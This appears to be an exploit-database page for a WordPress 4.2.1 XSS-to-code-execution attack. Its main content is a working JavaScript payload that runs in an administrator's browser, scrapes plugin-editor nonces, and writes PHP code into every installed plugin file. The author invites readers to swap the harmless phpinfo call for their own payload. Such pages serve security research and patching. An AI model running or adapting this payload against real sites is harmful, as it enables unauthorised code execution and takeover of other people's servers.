WordPress 4.2.1 XSS / Code Execution

2015.05.06
Credit: @Evex_1337
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

/* Author: @Evex_1337 Title: Wordpress XSS to RCE Description: This Exploit Uses XSS Vulnerabilities in Wordpress Plugins/Themes/Core To End Up Executing Code After The Being Triggered With Administrator Previliged User. ?\_(?)_/? Reference: http://research.evex.pw/?vuln=14 Enjoy. */ //Installed Plugins Page plugins = (window.location['href'].indexOf('/wp-admin/') != - 1) ? 'plugins.php' : 'wp-admin/plugins.php'; //Inject "XSS" Div jQuery('body').append('<div id="xss" ></div>'); xss_div = jQuery('#xss'); xss_div.hide(); //Get Installed Plugins Page Source and Append it to "XSS" Div jQuery.ajax({ url: plugins, type: 'GET', async: false, cache: false, timeout: 30000, success: function (txt) { xss_div.html(txt); } }); //Put All Plugins Edit URL in Array plugins_edit = [ ]; xss_div.find('a').each(function () { if (jQuery(this).attr('href').indexOf('?file=') != - 1) { plugins_edit.push(jQuery(this).attr('href')); } }); //Inject Payload for (var i = 0; i < plugins_edit.length; i++) { jQuery.ajax({ url: plugins_edit[i], type: 'GET', async: false, cache: false, timeout: 30000, success: function (txt) { xss_div.html(txt); _wpnonce = jQuery('form#template').context.body.innerHTML.match('name="_wpnonce" value="(.*?)"') [1]; old_code = jQuery('form#template div textarea#newcontent') [0].value; payload = '<?php phpinfo(); ?>'; new_code = payload + '\n' + old_code; file = plugins_edit[i].split('file=') [1]; jQuery.ajax({ url: plugins_edit[i], type: 'POST', data: { '_wpnonce': _wpnonce, 'newcontent': new_code, 'action': 'update', 'file': file, 'submit': 'Update File' }, async: false, cache: false, timeout: 30000, success: function (txt) { xss_div.html(txt); if (jQuery('form#template div textarea#newcontent') [0].value.indexOf(payload) != - 1) { // Passed, this is up to you ( skiddies Filter :D ) injected_file = window.location.href.split('wp-admin') [0] + '/wp-content/plugins/' + file; // http://localhost/wp//wp-content/plugins/504-redirects/redirects.php throw new Error(''); } } }); } }); }

References:

http://research.evex.pw/?vuln=14


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top